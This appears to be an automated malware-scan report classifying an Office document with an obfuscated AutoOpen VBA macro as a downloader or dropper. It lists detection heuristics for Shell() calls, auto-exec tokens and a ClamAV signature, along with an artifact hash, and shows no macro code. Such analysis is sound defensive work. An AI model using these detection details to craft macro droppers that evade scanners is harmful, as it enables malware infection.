Verdict: MALICIOUS (Risk Score: 242)
Malware Insights
MITRE ATT&CK: T1059.005 Visual Basic
The sample is a malicious Office document containing a VBA macro. The macro utilizes the Shell() function and concatenates strings to form a command, which is then likely executed. This behavior is indicative of a downloader or dropper, aiming to fetch and execute a secondary payload. The ClamAV detection further supports its malicious nature.
Heuristics (7)

- ClamAV: Doc.Dropper.Agent-6591930-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Dropper.Agent-6591930-0
- VBA macros detected (medium, OLE_VBA_MACROS, 3 related findings): Document contains VBA macro code
- Shell() call in VBA (critical, OLE_VBA_SHELL): Shell() call in VBA
- AutoOpen macro (high, OLE_VBA_AUTOOPEN): AutoOpen macro
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 10833 bytes |

SHA-256 of macros.bas: 158be2ca43a121d6c08ea838789cabb9a494444cb7782ba95ce4480323c4a715
Preview script: first 1,000 lines of the extracted script (obfuscated VBA source, truncated).